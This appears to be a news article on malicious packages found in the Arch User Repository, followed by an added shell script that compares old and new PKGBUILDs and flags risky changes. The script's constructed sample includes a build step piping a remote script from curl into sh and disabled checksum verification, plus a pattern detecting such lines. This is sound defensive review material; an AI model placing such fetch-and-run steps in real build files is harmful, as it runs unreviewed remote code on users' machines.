For the second time in a week, the AUR was found to contain malicious applications. What can Arch Linux users do about this?
Researchers at software supply chain management company Sonatype found that the Arch User Repository contained about 1,500 malicious packages, the company said in a blog post updated June 12.
"We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information," the Arch team said in a brief statement.
This does not bode well for a repository that was created to dramatically increase the amount of software available to Arch (and Arch derivative) users.
The AUR is essentially a way for developers to make new software available to users of Arch Linux before it is officially added to the Arch repositories. It's a collection of package descriptions (named PKGBUILDs) that make it possible to compile a package from source code using the makepkg tool and then install the package via the Arch Linux package manager, pacman.
The thing about the AUR is that anyone can upload packages to it, and a group of Trusted Users is charged with keeping tabs on what goes in.
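A small review aid in the spirit of the Arch team's advice above, added here as an example and not code from the article or the Arch project: it compares a package's previous and updated PKGBUILD and flags the changes worth a closer look before running makepkg. The package name, URLs and PKGBUILD contents are constructed samples.

```shell
# Print the value of a single-line field ($2) from PKGBUILD file $1.
pkgbuild_field() {
  sed -n "s/^$2=\(.*\)$/\1/p" "$1"
}

# $1 = old PKGBUILD, $2 = new PKGBUILD. Prints one finding per line.
review_pkgbuild() {
  # Fields whose change redirects what is fetched, how it is verified,
  # or what runs as root through pacman's .install hook.
  for f in source sha256sums install; do
    old=$(pkgbuild_field "$1" "$f")
    new=$(pkgbuild_field "$2" "$f")
    [ "$old" != "$new" ] && echo "CHANGED $f: [$old] -> [$new]"
  done
  # 'SKIP' tells makepkg not to verify the download at all.
  grep -q "sha256sums=.*SKIP" "$2" && echo "WARN checksum verification disabled"
  # A download piped straight into a shell runs unreviewed code at build time.
  grep -Eq "(curl|wget)[^|]*[|][[:space:]]*(ba)?sh" "$2" && echo "WARN download piped to shell"
  return 0
}

# Constructed sample: old PKGBUILD written to $1, updated PKGBUILD to $2
# (hypothetical package name and URLs, not a real AUR package).
write_samples() {
  cat >"$1" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
source=("https://example.org/example-tool-1.2.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
EOF
  cat >"$2" <<'EOF'
pkgname=example-tool
pkgver=1.2.1
source=("https://files.example.net/example-tool-1.2.1.tar.gz")
sha256sums=('SKIP')
install=example-tool.install
build() { curl -s https://files.example.net/setup.sh | sh; }
EOF
}

# Run the review over the constructed samples and print the findings.
demo_review() {
  o=$(mktemp) && n=$(mktemp)
  write_samples "$o" "$n"
  review_pkgbuild "$o" "$n"
  rm -f "$o" "$n"
}
demo_review
```

On a real system the two inputs would be the PKGBUILD from the installed version and the freshly fetched one; the heuristics are a starting point for a human review, not a substitute for reading the whole file.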
